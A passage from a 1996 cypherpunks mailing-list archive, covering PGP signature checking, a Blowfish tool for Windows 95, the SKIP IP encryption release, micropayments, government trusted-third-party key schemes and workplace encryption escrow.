    by intellectual property rights --often more valuable than a patent.  

	The RSA saga was first published in Scientific America in Aug of 1977  --it's 
    been a long, and expensive, road which may yet pan out before the basic patent 
    expires in 2001 or so.

		attila



--
Fuck off, Uncle Sam. Cyberspace is where democracy lives!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 23 Jun 1996 10:20:43 +0800
To: geoff@commtouch.co.il (geoff)
Subject: Re: Bad Signatures
In-Reply-To: <19960622151152974.AAB277@geoff>
Message-ID: <199606222240.RAA07977@homeport.org>
MIME-Version: 1.0
Content-Type: text


geoff wrote:

| I am not convinced. For a mailing list it makes sense for all members
| to be aware of message integrity problems. Not all cypherpunks have

	Why?  I don't care that your message lacked a signature, I
neither know who you are, or have any history of interactions with
you.

| your lisp package or Pronto Secure which make signature verification of
| the 10-20 pgp signed messages per day on the list a non trivial task.

	I'll claim that anyone on the list who wants to check
signatures could do so, and that having a 'signature bot' which would
need to sign its opinions adds nothing to message security, except a
single point for comprimise.

| I also like the idea that cpunks provides as a byproduct a platform for
| developers to test and debug their security products. We really should

	I see; you're offering your web site for the complete
archives?

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff@commtouch.co.il (geoff)
Date: Sun, 23 Jun 1996 04:20:46 +0800
To: cypherpunks@toad.com
Subject: Bad Signatures
Message-ID: <19960622151152974.AAB277@geoff>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sat Jun 22 18:22:50 1996

On Fri, 21 Jun 1996 10:15:13 "Travis J.I. Corcoran" wrote:

> I use a lisp package for emacs that I wrote to automatically verify
> signatures on incoming mail, so I already see the 10% of messages
> which are improperly signed displayed in a red "bad signature"
> font. Thus, I'd have no need of this service.
>
> Further, it makes philisophical/political sense to me to have
> verification distributed.  Every node should be doing it's own
> security.

I am not convinced. For a mailing list it makes sense for all members 
to be aware of message integrity problems. Not all cypherpunks have 
your lisp package or Pronto Secure which make signature verification of 
the 10-20 pgp signed messages per day on the list a non trivial task.

I also like the idea that cpunks provides as a byproduct a platform for 
developers to test and debug their security products. We really should 
be getting the bugs out of plain text signatures. You cannot expect Joe 
User to differentiate between an intruder and a gateway massaging the
message.

Geoff Klein
Pronto Secure Product Manager
 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMcwPzkLv5OMYFK1FAQH8tgP/Y/Qai5TQj45CGk7U9OdF5BrdycyQpKuE
UfAnlFut/LmgumyiM2wuy6+CPv8mPITAp375rNVx9UxvyRj8Gv8MFfEEuwVFZpNb
WbiWvl2yPBCV/ZBlEdmXJUPhfYto3FFjZX6AwKTMXgHd1j7uW3pBGSW24McEjM2I
aBQ1iDbLUY0=
=Igm9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 23 Jun 1996 13:35:47 +0800
To: "'Vladimir Z. Nuri'" <vznuri@netcom.com>
Subject: RE: info assembly line, "flits" (long)
Message-ID: <01BB6068.3EA6BA80@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Vladimir Z. Nuri

"flits" would have an identity irrespective of companies. one
could track them moving through different companies if necessary.
(the "flits" might therefore also have security aspects associated with
them.)  the point is that the data must not be disconnected, it
must be seen as continuous, and I think a flit-like concept is key
to accomplishing this.
...................................................................


Wouldn't this accounting of "flits" require that each of them be assigned a tag?   

Since this would encompass all the "flits" in cyberspace irrespective of who/where used them, whose "flits" would be counted first, beginning where?   

And once one "flit" was attached to a document which was maintained as a permanent structure somewhere in someone's database, that means it could not be used anywhere else, and how would this work for copies made of that original document?  

Once a "flit" was used as a copy and then detached and re-associated with some other document several times, would each new copy carry a record of where it had been previously, so that half of the amount of space of a document would be comprised of the historical record of where that "flit" had been?

Sounds very costly.

     ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 23 Jun 1996 11:58:04 +0800
To: ogren@cris.com
Subject: Re: Win95 Blowfish Implementation
In-Reply-To: <199606211918.PAA11089@darius.cris.com>
Message-ID: <199606222349.TAA05194@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David F. Ogren" writes:
> 3. MD5 can be used without royalty if the RSAREF library is used, 
> and if the proper credit is given to RSA.

Actually, MD5 has no restrictions on it at all. Its one thing RSA DSI
is nice about. Copies of the code are everywhere on the net, and are
totally unrestricted.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Josh Sled <jsled@skipjack.CS.Berkeley.EDU>
Date: Sun, 23 Jun 1996 16:35:20 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: info assembly line, "flits" (long)
In-Reply-To: <199606222047.NAA26324@netcom14.netcom.com>
Message-ID: <Pine.HPP.3.91.960622202438.18527B-100000@skipjack.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 22 Jun 1996, Vladimir Z. Nuri wrote:

> what does today's cyberspace lack to pull off this vision? after
> a bit of thought I think one word to describe it might be
> "continuity" or "persistence". there are so many obstacles in cyberspace to
> transporting documents. it requires too much manual effort
> on the part of each person to translate documents into particular
> formats, send them via email, etc.  what we need is the cyberspatial
> equivalent of continuity: people anywhere can look at the same
> object and see the same thing, and that thing can be moved around
> in cyberspace without ever losing its identity.

The problem is that all that today is handled through the very complex 
laws of physics... think about the the number of atoms that are necessary 
to hold the information for a single page, let alone an entire book...  
in a virtual reality "cyberspace", this would be an insurmountable data 
storage... on the small-scale.

> the problem is that today the concept of a "document" in "cyberspace"
> is merely a concept. I can't point to some "place" in cyberspace
> when I want someone to grab a document from me. I can't say, "here
> it is". I have to go through an artificial series of steps to
> encode the document, such as emailing it, ftping it, 
> uuencoding it, or whatever.

Yes, but you have to go through the same steps in the real world... you 
just don't see it... it's all handled through physics and the properties 
of electron repulsion between an object and your fingers (holding 
something) and light coming from a light-emiting source, being 
absorbed (in part) by an object and reflected toward your eye, 
which interpretes it (seeing something).  These are enormously complex 
tasks, far more so than uuencoding and e-mailing... but we don't 
recognize it because it's handled for us automagically.

> what I am getting at is that we need a kind of virtual reality to
> pull off the information assembly line to its utmost potential. I
> believe we literally need to create a visual metaphor for the 
> information assembly line that transcends the concepts of email,
> different computers, etc.  I should be able to "pick up" and "move"
> a document in cyberspace as easily as I move a piece of paper in
> the real world. the whole system of different servers, different
> software packages, different protocols, all this should 
> be *invisible*  to me in the same way it is invisible on the current
> WWW.

I think the thing that's most important in this sentence is _"move"_ ... 
this is the main problem for computers... it's SO easy to DUPLICATE 
information... but near impossible to make sure that you've MOVED it... 
if it was easy or even possible to MOVE something on a computer, 
the whole double-spending ecash argument would be kaput, as would the 
"wiping" a file vs. deleting it... I think that's what you're getting at, 
rather than the visual metaphor... which could be EASILY created.

> imagine that one actually created a total virtual reality 
> information assembly line. what kind of form would it take? you
> would see different things that can be done to documents
> as "tools" that can be applied to them. you would see their
> locations as simple visual metaphors that ignore the concepts
> that segregate information. for example, you might see a single
> file cabinet that represents every record in an entire company,
> regardless of its location anywhere in that company. tough to
> pull off? of course, but this is what we are headed towards, in
> my opinion.

Who says that this doesn't exist today?  The file server which I'm on 
says that there's a file in my "home directory" on "this" machine 
(skipjack.cs.berkeley.edu) called index.html... and if I went to the 
computer next to me, it would say that there's a file on the machine 
hornet.cs.berkeley.edu of the same name... but in reality the file is 
somewhere within a block of me on the machine cory.eecs.berkeley.edu... 
it's the same thing, just with a nice visual metaphor slapped on front.

> the concept of a bit is too abstract for me. for a virtual reality
> and an assembly line, I would prefer to say that information has
> two additional components other than a binary true/false value:
> a *location*, and a *time* that it is at a location. in this way
> information better matches our reality that we deal with every
> day. I would say the "flit" concept is a pivotal missing link
> in creating an information assembly line.

And key to the flit concept is the moving concept that I alluded to 
earlier... these flits could only exist if A) you had trusted|responsible 
software that moved them or B) they could ONLY move... like an atom... 
you cannot copy and atom... and to pull off what you're talking about... 
you wouldn't be able to copy a flit.

> this requires a somewhat radical shift in current technological
> thinking. currently we see data as stationary stuff that sits
> in some place, and people come along and run programs that
> churn up the bits and spit out new bits. but the new bits are
> not nicely tied to the old bits except through our own memories.
[snip]
> instead I would say that the key concept of information is to
> say that it has a content and a state at some time. a document
> composed of a bunch of "flits" can be broken up into its 
> component "flits", and the "flits" can be sent in different
> directions and recombined into different documents. but because
> they are "flits", I can *trace* their destinations over time.
> 
> what does this mean? it is the concept of debugging applied to

It means that you'd have an INSANELY large ammount of storage for a 
single small document.

If each flit was, say, a single bit in the document... you'd have almost 
atomic-like storage for a file... each part of each character would have 
a revision/tracking history...

But, if you're thinking on the document level... all you'd really need is 
a good compound-document technology (similar to OpenDoc) with a great 
revision history (similar to OpenDoc) that not only tracked revisions 
done by humans... but also revisions and handling done by programs.

> information technology. imagine that I once had a document, and
> I want to know what happened to it. because it is made of 
> "flits", I could say, "where did the flits that comprise this
> document go?" I would get an answer about their entire history--
> what programs the moved through, how they were recombined, 
> where they now reside. I could trace backwards too. "where did
> this flit come from?" -- the system would trace the origination
> of the flits.

Where would all this imformation be stored?  It's far too much for any 
filesystem or computer or harddrive in existance...

> what the flit concept does is introduce a *context* to a bit.
> a bit has no "context".  where did a bit come from? the situation
> with information is that it always has a *context* and is tied
> with other information. (so in addition, I might like to suggest
> that "flits" can be "tied together" with each other).

But bits aren't supposed to have context... they're just a state of 
being... on or off...

> when today's software spits out some document, there is nothing
> necessarily tying that document with the original input except
> the memory of the humans. I would suggest that the information
> assembly lines of the future will replace this concept. nothing
> will be left to the imagination. things that are part of people's
> memory today will be made explicit in the systems of tomorrow.
> the abstract concepts we have of systems being "tied" together
> will look very embryonic and impoverished compared to these
> new techniques.

But how about another approach... instead of the software spitting out 
a document... it gives back a combination of a document and the spit-out 
document... listing what's changed: revision control.

> "flits" would have an identity irrespective of companies. one
> could track them moving through different companies if necessary.
> (the "flits" might therefore also have security aspects associated with
> them.)  the point is that the data must not be disconnected, it
> must be seen as continuous, and I think a flit-like concept is key
> to accomplishing this.

Unfortunately, data IS disconnected... the only thing that makes it 
connected is what we impose on it by saying that a file stops when the 
EOF is reached, and in a particular file format, this character means "foo" 
and that character means "bar", etc... this is what makes data continuous.

> notice today how much our systems diverge from the flit concept.
> we are always losing bits, and not tying them together. whenever
> a system goes down, all those bits evaporate. this would not
> be acceptable in a flit universe-- it would be like an object
> suddenly blinking out of existence. obviously we don't consider that
> an acceptable behavior of objects in our current reality, why
> should we allow it in cyberspace? cyberspace has a long ways to
> go. today's cyberspace is barely sufficient for what is required.

But cyberspace is NOT real space... if it was, we'd require computers the 
size of this planet to store and process eveything.  Cyberspace is a 
computer-generated space... and computers are far from powerful enough to 
keep up with what you propose... and I suspect that they will be for a 
LONG time to come.  I think a computer-generated approach is a lot better.

> in a flit universe, I would like to see flits "pile up" in a
> queue when a machine breaks, like what happens in a real 
> assembly line. the assembly line metaphor is really crucial
> here. imagine that on some assembly line, all your objects
> suddenly disappear when a machine anywhere on the assembly
> line breaks. you have to then run other machines to "bring
> back" the flits. a ridiculous concept. instead, I'd like to
> see flits pile up when some machine goes down on the assembly
> line. once you get the machine running, it automatically starts
> back going through the flits.

assembly-line = server program
assembly track = queue based in permenant storage (hard drive, static 
	ememory, etc)
machine breaks, assembly-line program dies... machine comes back up... 
assembly-line program starts... continues to process queue on permemant 
storage... difference?

> a lot of this implies "transaction tracking" by conventional
> standards. I would suggest that "transaction tracking" and
> integrity assurance are only the barest rudiments of what is
> required to pull off an information assembly line. the 
> belief that these are now considered incredibly cutting-edge
> and state-of-the-art technologies
> is a good indication of how far we have to go.

VERY VERY VERY far...

> I mentioned Moore's law above because I think it takes care of
> all objections that "so and so that you are proposing would take
> too much time". imagine that we have virtually unlimited 
> computational capabilities-- what could we then do with this
> kind of power? tracking "flits" would be an excellent use
> for all this power, imho.

Well.. that's what i'm saying : "It'll take too much time".  But, 
considering Moore's law... you may be right... in a universe with 
"virtually unlimited" computing power, this, and a lot more, would be 
possible...

Josh





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skrenta@osmosys.incog.com (Rich Skrenta)
Date: Sun, 23 Jun 1996 16:50:19 +0800
To: cypherpunks@toad.com
Subject: SKIP IP-layer encryption release Beta 2.3
Message-ID: <199606230444.VAA00630@miraj.incog.com>
MIME-Version: 1.0
Content-Type: text/plain


We are pleased to announce the newest release of our domestic source
reference implementation into the public domain.

>From this public domain source release, you can build a fully functional
IP-layer encryption and authentication package with full key management.
Both FreeBSD 2.1.0 and SunOS 4.1.3 are supported in this release.
DES, triple-DES and SAFER are supported for encryption and keyed-MD5 is
supported for authentication.

This source produces a package which contains a loadable module which
works with existing TCP/IP stacks.  You do not need to replace (or even
recompile) your IP stack to use this package.

SKIP encrypts traffic at the IP packet layer.  Applications do not need
to be recompiled or modified to take advantage of encryption.

Source and pre-built binaries (for FreeBSD 2.1.0) may be obtained by US
and Canadian citizens from http://skip.incog.com/

    This software may be used without restriction, for commercial
    and/or non-commercial purposes.


Features of this release
------------------------

	o  Support for FreeBSD2.1.0 
	o  SKIP V2 compliant implementation using ESP and AH encapsulation.
	o  Support for Authentication using keyed-MD5.
	o  Support for DES, 3DES, and SAFER 128SK  for traffic and key 
	   encryption.
	o  Support for nomadic users
	o  Support for multiple local identities with different sets of
	   parameters.
	o  Support for multiple CA (Certificate Authority) certificates.
	o  Transport mode is supported.
	o  New Certificate Discovery protocol.
	o  Highly configurable key manager.
	o  Support for RAW AH and ESP protocols.
	o  Diffie-Hellman Public Key Agreement based system.
	o  Support for multiple NSIDs and multiple local certificates.
	o  GUI tool for user friendly manipulation of access control lists
	   and key statistics.
	o  Command line tools for manipulating access control lists, etc.
	o  Implementation of the Certificate Discovery protocol fully
	   integrated into SKIP.
	o  Implementation of X.509 public key certificates.
	o  Implementation of DSA signature algorithm for certificate
	   signatures.
	o  Implementation for MD2, MD5 and SHA message digest algorithms.
	o  Implementation of ASN.1 DER encoding/decoding.
	o  SunScreen(tm) SKIP compatibility mode.
	o  Implementation of hashed public keys as defined in the SKIP 
	   draft.  Implementation of programs to generate hashed public
	   keys,  to convert X.509 Certificates to hashed
	   keys and  print both X.509 and Hashed certificates.
	o  High performance Big Number library for Diffie-Hellman 
	   calculations.
	o  Implementation is effectively "public domain" and may be used both 
	   commercially and non-commercially.
	o  Patent Agreement with Cylink allows royalty-free use of the 
           Diffie-Hellman and other Stanford patents with this package for 
	   commercial and non-commercial use.  Read README.PATENT for 
	   some restrictions.
	o  Inclusion of prime generation program used to generate the 
	   primes in SKIP draft.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 23 Jun 1996 18:54:57 +0800
To: Paul Rarey <Paul.Rarey@Clorox.com>
Subject: Re: Micropayments: myth?
Message-ID: <199606230719.AAA19709@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>don't people get this? with microcurrency, you don't say to a 
>>seller, "bill me for this item". it would rarely work like that at
>>all. instead, it is, "here is my money, please give me the item". 
>
>What is the authentication process for the "money" your are "giving" in this 
>scenario?

Varies with the micropayment system.  Some proposals are to use Digicash,
either online or offline.  Others are to use simpler systems, such as S/Key 
variants or piles of tokens - you'd use some heavyweight payment system like
a credit card / ATM / digicash to buy 100 or 1000 microtokens, which you'd
use for the actual payments, and which would require less computation to
authenticate.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 23 Jun 1996 12:46:30 +0800
To: cypherpunks@toad.com
Subject: NS on TTPs
Message-ID: <199606230022.AAA00867@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   New Scientist, 22 July 1996, p. 10. 
 
 
   Crackdown on Net Crooks 'a charter for state snoopers' 
 
 
   Britain and France have become the first European nations 
   to take concerted action against swindlers and other 
   criminals operating on the Internet. The governments of 
   both countries last week announced plans to license Trusted 
   Third Parties (TTPs) to act as "honest brokers" for online 
   business transactions. But civil liberties campaigners fear 
   that the schemes may be snoopers' charters, giving police 
   forces and security agencies unprecedented opportunities to 
   spy on the world of business. 
 
   The idea is for TTPs to act as "introduction agencies" that 
   will reassure each party to a deal that the other has been 
   vetted and is reputable. TTPs will also hand out encryption 
   software that business partners will use to exchange 
   information in confidence. But in both countries, TTPs will 
   be required to release the keys to this encryption to the 
   police or the security services, on production of an 
   appropriate warrant. 
 
   Currently there are few safeguards to protect those 
   contemplating buying goods or services over the Internet 
   from fraudsters. "Cyberspace has become the new frontier 
   for scam artists," concluded a report released by the US 
   Federal Trade Commission last month. "The scams are not new 
   but the medium is." 
 
   John Moroney, a senior consultant at the computer 
   consultancy Ovum, believes TTPs are the best way to drive 
   forward the growth of business over the Internet. As online 
   transactions become commonplace, he argues, banks may be 
   especially keen to volunteer as TTPs, to protect their 
   dominance in the financial services market. "If home 
   shopping takes off they could be left exposed," says 
   Moroney. 
 
   But Simon Davies, director of the London-based civil 
   liberties watchdog, Privacy International calls the plan 
   "naive". He argues that businesses are perfectly capable of 
   setting up secure systems for electronic trade without 
   government involvement: "What is the government doing in 
   this field in the first place?" The British and French 
   proposals, Davies says, bear a strong resemblance to the 
   failed "Clipper chip" plan in the US. 
 
   The Clipper scheme involved building a scrambling chip into 
   all new telephones and computers. The keys to the scrambler 
   would have been in the hands of government-appointed 
   agencies. "With Clipper it quickly became clear the agenda 
   was broader than initially stated," says Davies, "and that 
   is exactly what will happen in Europe." He fears that if 
   the scheme takes off, companies not using TTP-approved 
   encryption software will instantly come under surveillance 
   by the police or security services. 
 
   The Department of Trade and Industry in Britain rejects 
   this claim. "The government licensing of TTPs is just a way 
   of enhancing consumer confidence," says a spokesman, who 
   adds that there are no plans to ban non-TTP software. 
   Banks, trade associations and telecommunications firms are 
   the most likely candidates for becoming TTPs, the DTI says. 
 
   -- Mark Ward 
 
   [End] 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Sun, 23 Jun 1996 17:19:55 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Win95 Blowfish Implementation
Message-ID: <199606230521.BAA21859@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Thanks to everyone who replied to my original message.  I was 
confident I could use those algorithms (I wouldn't have spent 
months on the code otherwise) but I wanted to check one more time
before I publicly released software using them.

One question though.  The following text is quoted from Bill 
Stewart.

> >2. SHA can be used without royalty.
> Yup.  Use SHA-1 rather than the original SHA, though; the NSA
> "updated" it in ways that do appear to strengthen it.
> 

What exactly is the difference between SHA and SHA-1?  Is it the 
left circular shift when generating the W array?  I coded the SHA 
alogrithm according to _Applied Cryptography_ Second Edition.  Is 
that the updated version of SHA?

Many thanks.

David F. Ogren

P.S.
Here is the super short description of Hootie:

Hootie is a Windows 95 implementation of the Blowfish algorithm.  
It is a fully graphical interface which includes drag and drop 
support as well as Explorer launch.

It can support both CBC and ECB modes.  The passphrase can either 
be directly entered by the user or the passphrase can be SHA hashed 
before use.

Hootie can optionally add headers at the beginning of the file 
which automatically select the block encryption mode and confirm 
good passphrases, or (for people concerned about known-plaintext 
attacks) omit the headers.

Future features include: generation of keys via a TNG (which are 
then saved to file), using MD5 rather than SHA, and a primitive 
text editor which which can be encrypted/decrypted to/from.

I currently expect to release the alpha version in two to three 
weeks.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMczT+fBB6nnGJuMRAQGcXgP+LcOp17aHIpoyScq9O8MlK+HcNBUsbdxq
KoFEqeDJyyL9pOcn9IdMHvZXmzzdBpEdk2q7DrObhk9z8Dy3jqai4t222upJ2kmn
blXGW3zIRdyycGg0ij0GCZzUkD6cSLpe4k5/HdhWhcgyDFx6t95sJIQAm/YIoC1R
JTTc86tmjss=
=iXHL
-----END PGP SIGNATURE-----
--
David F. Ogren
ogren@concentric.net (alternate address: dfogren@msn.com)
PGP Key ID: 0xC626E311
PGP Key Fingerprint: 24 23 CD 15 BF 8D D1 DE  81 71 84 C8 2C E0 4B 01
(public key available via server or by sending a message to
ogren@concentric.net with a subject of GETPGPKEY)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rochberg <rochberg+@cs.cmu.edu>
Date: Sun, 23 Jun 1996 17:20:34 +0800
To: ncognito@gate.net
Subject: Re: CFS Questions (protocol? safer/idea linkings?)
In-Reply-To: <+cmu.andrew.internet.cypherpunks+8ln8pS:00UfAQ10BJU@andrew.cmu.edu>
Message-ID: <9606230530.AA33018@GS84.SP.CS.CMU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


ftp://research.att.com/dist/mab/cfs.ps is Blaze's CFS paper (which I
was silly not to read before my last post to cfs-users).  It should
answer many of your questions.

The answer to your "why so muany keys" question is that CFS uses two
keys per attachment (2 * 64 per hybrid-3DES instance * 2 instances =
256).  This is an attempt to foil structural analysis of the
files---under ECB mode alone, identical parts of the file will be
encrypted to identical ciphertext.

To encrypt data, CFS first XORs the data with a long (.5 Mbyte,
according to the paper) repeated psuedo-random mask.  The mask is
generated by running the cipher in OFB mode with one of the keys.

Then the result of the XOR is encrypted in ECB mode with the other
key.  (There's some other optional XORing that goes on as well---read
the paper).

The passphrase->key bit is based on SHS.  Take a look at new_pwcrunch
in getpass.c in your distribution.

					-david







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 23 Jun 1996 21:50:45 +0800
To: perry@piermont.com
Subject: Re: Win95 Blowfish Implementation
Message-ID: <199606231035.GAA22878@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 22 Jun 96 at 19:49, Perry E. Metzger wrote:

> Actually, MD5 has no restrictions on it at all. Its one thing RSA DSI
> is nice about. Copies of the code are everywhere on the net, and are
> totally unrestricted.

I thought they asked for an acknowledgement in manuals or the 
programs usage or title message that it used RSA's MD5 
implementation, *if* you used their source code.

Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 23 Jun 1996 23:19:50 +0800
To: cypherpunks@toad.com
Subject: Those Evil Republicans
Message-ID: <2.2.32.19960623115852.00b8c130@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


"They believe that the Government is the problem and that what everyone
needs is to be told, 'You're on your own; go out there into the tender
mercies of the global economy; have a great time in cyberspace, and we'll
get out of your way.'" -- William Jefferson Blythe Clinton in a speech to
the AFSCME in Chicago on Friday.

I guess he doesn't want us to have fun in cyberspace -- though he didn't say
so directly.

DCF

In the same speech in which he talked about people hunting ducks with rifles.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 24 Jun 1996 06:57:24 +0800
To: cypherpunks@toad.com
Subject: Re: Oil Change software snoops through hard drive
Message-ID: <adf2d22c00021004b6d8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:31 PM 6/23/96, Alan Lewine wrote:
><<I wrote:
>>But this isn't MS's RegWiz. It's capabilities sound much greater, and
>>it's not clear how to opt out, etc. >>Tim May replied:
><<Not buying it and not installing it would appear to be an easy way to
>"opt out.">>
>Maybe i'm confused, but oil change sounds like a mole that can burrow
>unbidden into user's disks. I don't think user installation is required,
>or else it will auto install the user code on installation of whatever
>software has licensed it.

If I understand your comments (the strange wrapping doesn't make it easy),
you are confusing Oil Change with a virus or worm.

It's a commercial product, offering a (putative) service to those who buy
it. One "opts out" by not buying and installing it.

There may be privacy implications, but then there are privacy implications
in all sorts of other areas. Such as filling out a loan request, applying
for a credit card, visiting a doctor, etc. I'm of course not saying that
these privacy implications are not worth discussing, and do not vary from
example to example in seriousness, only that Oil Change hardly appears to
be a significant threat.

To repeat, no one is forced to buy and install Oil Change, and it certainly
doesn't copy itself onto the machines of unsuspecting users.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Mon, 24 Jun 1996 03:16:56 +0800
To: sandberg@wsj.com
Subject: Tales from the UK: Part III
Message-ID: <199606231513.LAA01959@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


Attacks on the Financial Sector: Reprise

I've spent the last two weeks in Europe, five countries, an avarage of 2.6 
countries per day. Two kids and a wife along for a 'family vacation' which I 
have concluded is a modern day oxymoron. I'm thankfully back on the road to DC 
and Atlanta, sans kids, in a few days for a well earned rest.  :-) (Love you 
honey, really do, but I do need a break . . . .)

But what you care about is the attacks that the Sunday Times has been talking 
about for the last couple of weeks. I've received incredible volumes of email on 
this story asking for more details - mostly very supportive - so here goes

I met with the Times in London's Trocadero (while the kids played Virtual Games 
upstairs in an incredible arcade). I also spoke with them at length while at the 
top of Le Tour Eiffel, at Euro-Disney (Space Mountain violently pivots you end 
over end in complete darkness: a definite PG-13 ride), on the Chunnel Train and 
at Legoland. 

First, the errors in their reporting that annoy me:

	1. As a co-sponsor of InfoWarCon, I can assure you that the Brussels 
event had *nothing* to do with the alleged attacks as the June 2 article 
implies.

	2. There were absolutely *no* secret meetings at InfoWarCon about the 
alleged attacks,

	3. Laithe Gambit is not a secret study group about the distresses of the 
financial community. It is a NATO SHAPE security group and most of it is quite 
open.

Despite the protestations of the Net community, masses of media folks and my own 
criticisms of their writings, the Sunday Times is sticking by their stories with 
dedicated vehemence. In some ways they seem confused and chagrined that their 
reporting is suspect. They really do believe what they are saying. I argued that 
they gave no names of their sources and they responded that it wasn't  necessary 
since they used the word 'spokesman' in several places. We have to remain 
disagreed on that point. If it's a rumor, then say it's a rumor. If it's a well 
placed source who wants anonymity, say so. If it's a spokesman, name him in 
writing. 

As a result, the U.S. media has been calling Kroll Associates and the NSA and 
the British DTI and so on and getting rebuffed at every turn with firm denials 
of having ever had conversations of the nature claimed in the Times' articles. 
According to the media with whom I've spoken, this is a giant red flag. 
Curiously, though, according to the Times, when they call back the very sources 
used for the articles in the first place, they too are being met with cold 
shoulders and 180 degree attitude shifts. Curiouser and curiouser.

The Times swears by the validity of the story, and is putting on additional 
pressure to those people who they claim are in-the-know and will come out with 
the real details which could be further corroberated. I will be receiving, 
hopefully this weekend, (not here yet) an updated article that is being 
published in the UK on this story. From what I've heard about it so far, it will 
include some comments from Russian Admiral Pirumov (ret) and others on the 
record.

In the next couple days: Someone in Basel corroberates the tale.



Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: predator <naim@micronet.fr>
Date: Sun, 23 Jun 1996 20:55:32 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
In-Reply-To: <Pine.A32.3.91.960621144854.52010A-100000@holly.ACNS.ColoState.EDU>
Message-ID: <31CD1106.13D0@micronet.fr>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Mon, 24 Jun 1996 08:09:35 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmerman/Viacrypt
Message-ID: <2.2.32.19960623191752.007219f0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:25 AM 6/15/96 PDT, Edgar Swank <edgar@Garg.Campbell.CA.US> wrote:
[snip]
>Seems to me an employer has a perfect right to monitor his employee's
>work product, for which he's being paid a salary and using the
>employer's equipment (like business PGP).  If the employee doesn't
>like it, he's free to seek employment elsewhere (or start his own
>business).  Or he's free to encrypt all his personal Email at home
>with a personal copy of ViaCrypt or a copy of free PGP.

Sometimes these workplace privacy issues are really hard for me to come to a
clear decision on.

I don't know how many of you have been in a workplace where someone quit by
just walking out in the middle of the day, but I have.  Things would have
been really messy had the person left encrypted data lying around that the
company had no key for.  It probably wouldn't have been hard to get a judge
to make the employee give up the key (after getting the judge to understand
what the hell encryption is...), but the time lost might have had a real
impact on project deadlines.

I'm not sure what the answer is, but I have a feeling that as an employer I
probably wouldn't want to provide encryption that I had no key for.  What if
an employee died suddenly, and I needed access to their records/email?

Perhaps a somewhat enlightened employer could opt to split the escrowed key
up and pass it along to several people in the office, to help prevent
management from just spying on everyone.

Phil's feelings about PGP are a different matter, though.  If he feels it
shouldn't be used that way, and that Viacrypt has violated their agreement,
then he should pursue it, IMHO.  It doesn't necessarily follow that he's
just using it as an excuse to wrest the commercial version from them.  He
may feel they really have gone beyond what was agreed upon.  I suppose it
